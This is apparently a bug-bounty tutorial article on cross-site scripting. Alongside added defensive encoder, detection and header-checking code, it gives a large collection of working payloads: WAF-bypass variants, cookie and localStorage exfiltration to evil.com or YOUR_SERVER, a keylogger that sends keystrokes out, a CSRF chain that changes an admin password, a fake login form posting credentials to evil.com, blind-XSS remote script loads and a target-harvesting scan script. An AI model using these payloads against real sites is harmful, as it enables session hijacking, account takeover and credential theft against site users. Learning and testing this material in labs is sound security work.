What Will We Learn Today?
- What XSS is, starting from the very basics
- The three types: Reflected, Stored and DOM-Based
- Context-based bypasses (elite technique)
- Advanced WAF bypass techniques
- Real payloads that work in 2026
- Automated + manual testing
- Maximizing bug bounty impact
Why does it matter? XSS is always in the OWASP Top 10 as the most common web vulnerability! From a simple <script>alert(1)</script> all the way to account takeover, session hijacking and malware delivery: the impact of XSS can be enormous!
What Is XSS? A Simple Analogy
Imagine a notice board at a school:
Normal Student:
→ Writes "There's a cricket match today"
→ Everyone reads it → safe!
Evil Student (Attacker):
→ Writes "If you read this, hand your wallet over to me"
→ Everyone reads it → they hand over their wallets!
The same thing happens on a website:
Normal User:
→ Comment: "Great article!"
→ The website displays it → safe!
Attacker:
→ Comment: <script>steal_cookies()</script>
→ The website executes it!
→ Every visitor's cookie is stolen!
XSS = injecting malicious JavaScript and getting it executed in the victim's browser!
The Three Types of XSS

Type 1: Reflected XSS (Mirror Attack)
Flow:
1. Attacker → builds a malicious link:
https://target.com/search?q=<script>alert(1)</script>
2. Victim → clicks the link
3. Server → reflects the q parameter directly into the response
4. Browser → executes the script!
"Reflect" = the server mirrored the input back without sanitizing it!
Real Example:
Request:
GET /search?q=<script>alert(document.cookie)</script>
Response:
<h1>Search results for:
<script>alert(document.cookie)</script>
</h1>

Type 2: Stored XSS (Persistent Attack, HIGHEST IMPACT!)
Flow:
1. Attacker → stores a malicious payload in the DATABASE
(comment, profile name, message, etc.)
2. Payload → is saved permanently on the server
3. Every visitor → the payload triggers automatically!
"Stored" = inject once → thousands of users affected!
Real Example:
The attacker posted this in the comment section:
<script>
new Image().src='https://evil.com/steal?c='+document.cookie;
</script>
→ Every user who opens this page
→ has their cookie sent to the attacker's server!
→ If an admin opens it too → the admin session is stolen!

Type 3: DOM-Based XSS (Client-Side Attack)
Flow:
1. The server response is safe
2. The page's own JavaScript manipulates the DOM
3. User input goes straight into the DOM → unsafe!
The server never even notices!
Scanners miss it too!
Real Example:
// Vulnerable JavaScript code:
var search = location.hash.substring(1);
document.getElementById('output').innerHTML = search;
// Attack URL:
https://target.com/page#<img src=x onerror=alert(1)>
// The server did nothing; the browser injected it by itself!

PART 2: XSS Contexts (Understand These or Your Payloads Won't Work!)
Context = where is the input being reflected? In the HTML body? In an attribute? In JavaScript?
Context 1: HTML Body Context
<!-- Input is reflected here: -->
<p>Hello, USER_INPUT_HERE</p>
<!-- Basic payloads: -->
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>

Context 2: HTML Attribute Context
<!-- Input is reflected inside an attribute: -->
<input value="USER_INPUT_HERE">
<!-- Close the attribute first: -->
"><script>alert(1)</script>
" onmouseover="alert(1)
" autofocus onfocus="alert(1)

Context 3: JavaScript String Context
// Input is reflected inside a JS string:
var name = 'USER_INPUT_HERE';
// Break out of the string:
';alert(1);//
\';alert(1);//
</script><script>alert(1)</script>

Context 4: JavaScript Template Literal
// Modern JS template literal:
var msg = `Hello ${USER_INPUT}`;
// Payload:
${alert(1)}

Context 5: URL/href Context
<a href="USER_INPUT">Click</a>
<!-- Payloads: -->
javascript:alert(1)
data:text/html,<script>alert(1)</script>
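The defender's side of the context rule, as an added example that is not from the original article: the context that decides which payload fires is the same context that decides which encoder neutralises it. The function names below (encodeForHtml, encodeForAttribute, encodeForJsString, isSafeHref, renderSafely, injectedScriptTags) are my own, not from any library; the sample inputs are the context payloads listed above, constructed here as test data. For the DOM-based case in Part 1 the equivalent fix is assigning to textContent instead of innerHTML, which needs a browser and is not shown here.

```javascript
// Added example (not from the original article): one output encoder per
// context from Part 2. Sample inputs are the article's own context payloads,
// embedded here as constructed test data.

// Context 1 (HTML body) and Context 2 (quoted attribute): escape the five
// characters that can start or end markup. The attribute must be written in
// double quotes in the template; an unquoted attribute would still be injectable.
function encodeForHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}
const encodeForAttribute = encodeForHtml;

// Context 3 (JS string literal inside <script>): \uXXXX-escape everything
// outside [A-Za-z0-9], so quotes, backslashes and "</script>" cannot end the
// literal or the script element. Non-BMP characters become surrogate pairs.
function encodeForJsString(input) {
  return String(input).replace(/[^A-Za-z0-9]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Sanity check for the JS encoder: the escaped form must decode back to the
// original (JSON shares the \uXXXX escape syntax with JavaScript).
function jsEncodingRoundTrips(input) {
  return JSON.parse('"' + encodeForJsString(input) + '"') === input;
}

// Context 5 (href/src): no encoder makes "javascript:" or "data:" safe, so
// validate the scheme instead. Control characters are stripped first because
// browsers ignore tab/newline inside a scheme, which "java\tscript:" relies on.
function isSafeHref(url) {
  const cleaned = String(url).replace(/[\x00-\x20]/g, '');
  if (/^[a-z][a-z0-9+.-]*:/i.test(cleaned)) return /^https?:/i.test(cleaned);
  return !cleaned.startsWith('//');          // relative, but not protocol-relative
}

// Render the Part 2 template with one untrusted value in every context. Each
// slot uses the encoder that matches where it sits.
function renderSafely(input, href) {
  const link = isSafeHref(href) ? href : '#';
  return [
    `<p>Hello, ${encodeForHtml(input)}</p>`,
    `<input value="${encodeForAttribute(input)}">`,
    `<script>var name = '${encodeForJsString(input)}';</script>`,
    `<a href="${encodeForAttribute(link)}">Click</a>`,
  ].join('\n');
}

// Constructed inputs: the article's own payloads for each context.
const SAMPLE_INPUTS = [
  '<script>alert(1)</script>',
  '" onmouseover="alert(1)',
  "';alert(1);//",
  '</script><script>alert(1)</script>',
];

// Count how many "<script" start tags appear in the rendered output beyond the
// one the template itself contains; 0 means the input was neutralised.
function injectedScriptTags(input) {
  const out = renderSafely(input, 'javascript:alert(1)');
  return (out.match(/<script/gi) || []).length - 1;
}
```

Context 4 needs no separate encoder: encodeForJsString also escapes `$`, `{` and the backtick, so a value placed inside a template literal cannot open a `${...}` substitution. isSafeHref is deliberately conservative and rejects every scheme except http and https; widen the allow-list only for schemes the application actually needs.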
PART 3: WAF Bypass Techniques (Elite Level)

Bypass 1: Case Variation
// Blocked: <script>
// Bypass:
<SCRIPT>alert(1)</SCRIPT>
<ScRiPt>alert(1)</ScRiPt>
<sCrIpT>alert(1)</sCrIpT>

Bypass 2: Event Handlers (No script tag!)
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<svg onload=alert(1)>
<body onload=alert(1)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<video src=x onloadstart=alert(1)>
<audio src=x onloadstart=alert(1)>

Bypass 3: Encoding Tricks
// HTML Entity Encoding
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
// URL Encoding
%3Cscript%3Ealert(1)%3C/script%3E
// Double URL Encoding
%253Cscript%253E
// Unicode
\u003cscript\u003e
// Hex
\x3cscript\x3e

Bypass 4: Filter Evasion
// "script" word blocked?
<scr<script>ipt>alert(1)</scr</script>ipt>
<scr\x00ipt>alert(1)</scr\x00ipt>
// "alert" blocked?
alert`1`
confirm(1)
prompt(1)
eval('ale'+'rt(1)')
(alert)(1)
a=alert,a(1)
top['ale'+'rt'](1)
window['alert'](1)

Bypass 5: Parenthesis-Free Payloads
// When () is blocked:
alert`1`
throw/*//<img/src=x onerror=alert(1)>
{onerror=alert}throw 1

Bypass 6: JavaScript Protocol
// In href or src:
javascript:alert(1)
javascript:alert(document.domain)
JaVaScRiPt:alert(1)
java	script:alert(1)
java
script:alert(1)

Bypass 7: SVG Vectors
// SVG = the most powerful XSS vector!
<svg><script>alert(1)</script></svg>
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload=alert(1)>
<svg onload="alert(1)">
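Turning Part 3 around for detection, as an added example that is not from the original article: a WAF or SIEM rule that looks for the literal text <script> misses every bypass above, while a rule that first peels off the encodings and whitespace tricks and then matches on sinks (script tags, on*= handlers, the javascript: scheme) catches them. The function names (normalize, classify, naiveMatch, parseLogLine, suspiciousRequests) and the access-log lines are constructed for this example; the encoded query strings in those lines are the bypass payloads from the sections above as they would appear on the wire.

```javascript
// Added example (not from the original article): detection logic for the
// Part 3 bypasses, run over constructed access-log lines.

// Undo the encoding layers listed in Bypass 3 and the NUL/whitespace tricks in
// Bypasses 4 and 6, then lower-case, so one rule set covers all the variants.
function normalize(raw) {
  let s = String(raw);
  for (let i = 0; i < 3; i++) {            // peel %25 layers: %253C -> %3C -> <
    let decoded;
    try { decoded = decodeURIComponent(s); } catch { break; }
    if (decoded === s) break;
    s = decoded;
  }
  s = s
    .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/&lt;/gi, '<')
    .replace(/&gt;/gi, '>')
    .replace(/\x00/g, '')                              // <scr\x00ipt>
    .replace(/java\s*script\s*:/gi, 'javascript:');   // java\tscript:, java\nscript:
  return s.toLowerCase();
}

// Sinks the bypass payloads end in, independent of the encoding they arrived in.
const RULES = [
  { name: 'script-tag',    re: /<\s*script\b/ },
  { name: 'event-handler', re: /<\s*[a-z]+[^>]*\bon[a-z]+\s*=/ },
  { name: 'js-scheme',     re: /javascript\s*:/ },
];

// The naive rule that the bypass section defeats.
function naiveMatch(raw) {
  return String(raw).includes('<script>');
}

// Names of the rules that fire after normalisation (empty array = nothing found).
function classify(raw) {
  const n = normalize(raw);
  return RULES.filter((r) => r.re.test(n)).map((r) => r.name);
}

// Constructed combined-log-format lines (sample data, not a real server).
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2026:10:00:00 +0000] "GET /search?q=test HTTP/1.1" 200 512',
  '10.0.0.6 - - [01/Jan/2026:10:00:01 +0000] "GET /search?q=%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 612',
  '10.0.0.7 - - [01/Jan/2026:10:00:02 +0000] "GET /search?q=%253Csvg%2520onload%253Dalert(1)%253E HTTP/1.1" 200 600',
  '10.0.0.8 - - [01/Jan/2026:10:00:03 +0000] "GET /go?next=java%09script:alert(1) HTTP/1.1" 302 0',
  '10.0.0.9 - - [01/Jan/2026:10:00:04 +0000] "GET /search?q=%3Cimg%20src%3Dx%20onerror%3Dalert%601%60%3E HTTP/1.1" 200 630',
];

// Pull the client IP and the raw query string out of one log line.
function parseLogLine(line) {
  const m = line.match(/^(\S+) .*?"(?:GET|POST) (\S+) HTTP\//);
  if (!m) return null;
  const q = m[2].indexOf('?');
  return { ip: m[1], query: q === -1 ? '' : m[2].slice(q + 1) };
}

// One record per line where at least one rule fired, with the naive verdict
// alongside to show what a literal "<script>" match would have missed.
function suspiciousRequests(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req) continue;
    const rules = classify(req.query);
    if (rules.length) hits.push({ ip: req.ip, rules, naive: naiveMatch(req.query) });
  }
  return hits;
}
```

These rules are meant for alerting and triage, not for blocking: the event-handler pattern is a heuristic that will also flag harmless markup in a comment field, and a denylist is never a substitute for the context-aware output encoding that removes the bug itself.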
PART 4: Maximize the Impact (Raise Your Bounty!)
You don't get a bounty for alert(1); you get it for IMPACT!
Impact 1: Cookie Stealing (Account Takeover)
// Basic cookie steal
<script>
document.location='https://YOUR_SERVER/steal?c='+document.cookie
</script>
// Via an image tag (stealthier)
<img src=x onerror="this.src='https://YOUR_SERVER/c?='+document.cookie">
// Via XHR
<script>
var x = new XMLHttpRequest();
x.open('GET','https://YOUR_SERVER/?c='+btoa(document.cookie));
x.send();
</script>

Impact 2: Session Hijacking
// Steal localStorage as well
<script>
fetch('https://YOUR_SERVER/?data='+btoa(
JSON.stringify({
cookies: document.cookie,
localStorage: JSON.stringify(localStorage),
sessionStorage: JSON.stringify(sessionStorage),
url: location.href
})
));
</script>

Impact 3: Keylogger
// Whatever the victim types → everything gets recorded!
<script>
document.addEventListener('keyup', function(e){
fetch('https://YOUR_SERVER/?k='+btoa(e.key));
});
</script>

Impact 4: CSRF + XSS Combo (Account Takeover Chain!)
// Perform admin actions using the admin's session
<script>
// Step 1: grab the admin's CSRF token
fetch('/admin/settings')
.then(r=>r.text())
.then(html=>{
var token = html.match(/csrf_token.*?value="(.*?)"/)[1];
// Step 2: use the token to change the password
fetch('/admin/change-password',{
method:'POST',
body:'new_password=hacked123&csrf_token='+token,
headers:{'Content-Type':'application/x-www-form-urlencoded'}
});
});
</script>

Impact 5: DOM Manipulation (Phishing)
// Replace the login form with a fake one!
<script>
document.body.innerHTML = `
<form action="https://evil.com/steal" method="POST">
<h2>Session Expired: Please Login Again</h2>
<input name="user" placeholder="Username">
<input name="pass" type="password" placeholder="Password">
<button>Login</button>
</form>`;
</script>

PART 5: Where to Look for XSS? (Input Points)
SEARCH BARS → q=, search=, query=
COMMENT SECTIONS → Stored XSS most likely!
PROFILE FIELDS → Name, Bio, Website
EMAIL FIELDS → Sometimes they get reflected
CONTACT FORMS → The message is emailed to the admin
URL PARAMETERS → ?name=, ?msg=, ?error=
COOKIES → Are cookie values reflected?
HTTP HEADERS → User-Agent, Referer, X-Forwarded-For
REDIRECT PARAMS → ?next=, ?url=, ?redirect=
FILE UPLOADS → XSS in SVG files!
JSON RESPONSES → Injection in API responses

PART 6: Automated XSS Testing
Tool 1: Dalfox (Best XSS Scanner)
# Install
go install github.com/hahwul/dalfox/v2@latest
# Single URL
dalfox url "https://target.com/search?q=test"
# URLs from a file
dalfox file xss_candidates.txt
# From a pipeline
cat gau_urls.txt | gf xss | dalfox pipe \
--silence \
--no-color \
-o xss_found.txt
# With custom payloads
dalfox url "https://target.com/?q=test" \
--custom-payload payloads.txt

Tool 2: XSSHunter (For Blind XSS)
# Create an account on xsshunter.com (free)
# You'll get your payload:
# "><script src=https://yoursubdomain.xss.ht></script>
# Put it in every input field
# If it gets reflected in an admin panel or in an email,
# a callback arrives on your dashboard!
# Blind XSS = $500-$2000 bounty!

Tool 3: Burp Suite (Manual Testing)
# With Burp Suite Intruder
1. Intercept the request
2. Right-click the parameter → Send to Intruder
3. Mark the payload position
4. Load an XSS payload list
5. Start the attack
6. Look for unescaped payloads in the responses

PART 7: SVG File Upload XSS (Advanced)
<!-- Create malicious.svg -->
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
<!-- Upload it in place of a profile picture -->
<!-- If the SVG is served directly → XSS! -->

PART 8: XSS Prevention (From a Reporter's Point of View)
Including this in the report increases the impact!
Vulnerable Code:
echo "<p>Hello, " . $_GET['name'] . "</p>";
Fixed Code:
echo "<p>Hello, " . htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8') . "</p>";
Prevention Methods:
1. Output Encoding (htmlspecialchars)
2. Content Security Policy (CSP) headers
3. HttpOnly cookie flag
4. Input validation
5. Framework built-in escaping
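The prevention list above and the Part 7 upload case as concrete response headers, in an added example that is not from the original article: hardenedPageHeaders() sets a CSP without 'unsafe-inline' (so the inline <script> payloads earlier in the article do not run) and an HttpOnly session cookie (so document.cookie returns nothing to the cookie-theft payloads in Part 4); uploadedFileHeaders() forces an uploaded SVG to download instead of rendering in the site's origin; assess() reports which of those mitigations a response lacks. The function names and header values are my own choices for this example, not taken from any real site.

```javascript
// Added example (not from the original article): the Part 8 prevention list
// as response headers, plus a checker for the mitigations a response lacks.

// Headers for a normal HTML page. CSP without 'unsafe-inline' blocks inline
// script payloads; HttpOnly keeps the session cookie out of document.cookie.
function hardenedPageHeaders() {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    'X-Content-Type-Options': 'nosniff',
    'Set-Cookie': 'session=<opaque-value>; HttpOnly; Secure; SameSite=Lax; Path=/',
  };
}

// Headers for serving a user-uploaded file (Part 7). An SVG or HTML upload is
// forced to download and, if ever rendered, runs in a script-less sandbox.
function uploadedFileHeaders(contentType) {
  const h = { 'Content-Type': contentType, 'X-Content-Type-Options': 'nosniff' };
  if (/^(image\/svg\+xml|text\/html)/.test(contentType)) {
    h['Content-Disposition'] = 'attachment';
    h['Content-Security-Policy'] = "default-src 'none'; sandbox";
  }
  return h;
}

// Parse a CSP header value into { directive: [sources] }.
function parseCsp(value) {
  const out = {};
  for (const part of String(value).split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) out[name.toLowerCase()] = sources;
  }
  return out;
}

// Return finding codes; an empty list means every checked mitigation is
// present. This is a heuristic checker, not a full CSP evaluator.
function assess(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const findings = [];
  const ct = h['content-type'] || '';
  const renderable = !ct || /^(text\/html|image\/svg\+xml)/.test(ct);

  if (renderable) {
    if (!h['content-security-policy']) {
      findings.push('no-csp');
    } else {
      const csp = parseCsp(h['content-security-policy']);
      const scriptSrc = csp['script-src'] || csp['default-src'];
      if (!scriptSrc) {
        findings.push('csp-no-script-src');
      } else {
        // A nonce or hash source makes 'unsafe-inline' ignored by modern browsers.
        const strict = scriptSrc.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
        if (!strict && (scriptSrc.includes("'unsafe-inline'") || scriptSrc.includes('*'))) {
          findings.push('csp-allows-inline');     // <script>alert(1)</script> would run
        }
      }
    }
  }
  for (const cookie of [].concat(h['set-cookie'] || [])) {
    if (!/;\s*httponly/i.test(cookie)) findings.push('cookie-readable-by-script');
    if (!/;\s*secure/i.test(cookie)) findings.push('cookie-not-secure');
  }
  if (!/^nosniff$/i.test(h['x-content-type-options'] || '')) findings.push('no-nosniff');
  if (/^image\/svg\+xml/.test(ct) && !/attachment/i.test(h['content-disposition'] || '')) {
    findings.push('svg-rendered-inline');        // the Part 7 upload would execute
  }
  return findings;
}
```

Run assess() against the headers of a real response captured in Burp to see which of the impacts in Part 4 are still reachable: cookie-readable-by-script is the finding behind every document.cookie exfiltration payload on this page, and csp-allows-inline is the one behind every inline <script> payload. CSP and HttpOnly reduce what an XSS can do; only output encoding (prevention method 1) removes the XSS itself.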
Elite XSS Hunting Workflow
#!/bin/bash
# xss_hunt.sh
TARGET=$1
if [ -z "$TARGET" ]; then
  echo "Usage: $0 <domain>"
  exit 1
fi
DIR="xss_${TARGET}"
mkdir -p "$DIR"
echo "XSS Hunt: $TARGET"
# Step 1: collect URLs
gau "$TARGET" | grep "?" | \
grep -vE "\.(png|jpg|css|js|gif)" | \
uro > "$DIR/urls.txt"
# Step 2: filter XSS candidates
cat "$DIR/urls.txt" | gf xss > "$DIR/xss_cands.txt"
echo "XSS Candidates: $(wc -l < "$DIR/xss_cands.txt")"
# Step 3: scan with Dalfox
touch "$DIR/xss_found.txt"   # so the count below works even when nothing is found
cat "$DIR/xss_cands.txt" | \
dalfox pipe \
--silence \
--no-color \
--follow-redirects \
-o "$DIR/xss_found.txt" 2>/dev/null
echo "XSS Found: $(wc -l < "$DIR/xss_found.txt")"
# Step 4: interesting parameters for manual testing
# (keep the pattern on one line: a line break inside the quotes adds an empty
# alternative that matches every URL)
cat "$DIR/xss_cands.txt" | grep -iE \
"search|query|q=|name|msg|message|error|alert|redirect|next" \
> "$DIR/manual_test.txt"
echo "Manual targets: $(wc -l < "$DIR/manual_test.txt")"
echo "Results in: $DIR/"

XSS Payloads Cheat Sheet
// ---- BASIC ----
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
// ---- ATTRIBUTE CONTEXT ----
"><script>alert(1)</script>
" onmouseover="alert(1)
" autofocus onfocus="alert(1)
// ---- JS CONTEXT ----
';alert(1);//
\';alert(1);//
// ---- FILTER BYPASS ----
<ScRiPt>alert(1)</ScRiPt>
<img src=x onerror=alert`1`>
alert`1`
(alert)(1)
top['ale'+'rt'](1)
// ---- HIGH IMPACT ----
<script>document.location='https://evil.com/?c='+document.cookie</script>
<img src=x onerror="fetch('https://evil.com/?c='+btoa(document.cookie))">
// ---- BLIND XSS ----
"><script src=https://yoursubdomain.xss.ht></script>

Today's Homework
1. Set up DVWA (Damn Vulnerable Web App):
docker run -d -p 80:80 vulnerables/web-dvwa
2. Complete the three levels of the XSS section:
→ Low: Basic <script>alert(1)</script>
→ Medium: Bypass the filter
→ High: Use a WAF bypass technique
3. Test DOM XSS:
https://xss-game.appspot.com/
(Google's free XSS practice game!)
4. Install Dalfox and test it:
dalfox url "http://testphp.vulnweb.com/search.php?test=1"

Quick Revision
XSS = injecting malicious JS
Reflected = URL parameter → in the response
Stored = in the database → affects everyone
DOM-Based = the page's JS manipulates the DOM itself
Context = HTML / Attribute / JS → different payloads!
WAF Bypass = encoding, event handlers, case variation
Impact = cookie theft > alert(1)!
Tools = Dalfox, XSSHunter, Burp Suite

A Word From Me…
The first time I found an XSS, it was just alert(1)!
I sent the report and the company said:
"Self-XSS → Not Applicable"
I didn't understand it back then, but I learned that you have to prove the impact!
The second time I found the same kind of XSS, but this time:
<script>
document.location='https://MY_SERVER/?c='+document.cookie
</script>
I took a screenshot: the cookie was actually stolen, and it was an admin cookie!
Bounty: $750 (Medium)!
Lesson: alert(1) is not a PoC; show real impact!
In the next article: SQL Injection, getting inside the database, pulling out data and sometimes a complete server takeover!
HackerMD Bug Bounty Hunter | Cybersecurity Researcher GitHub: BotGJ16 | Medium: @HackerMD
Previous: Article #13 Nuclei Grand Finale | Next: Article #15 SQL Injection: Hack the Database!
#XSS #CrossSiteScripting #BugBounty #WebSecurity #EthicalHacking #Hinglish #OWASP #HackerMD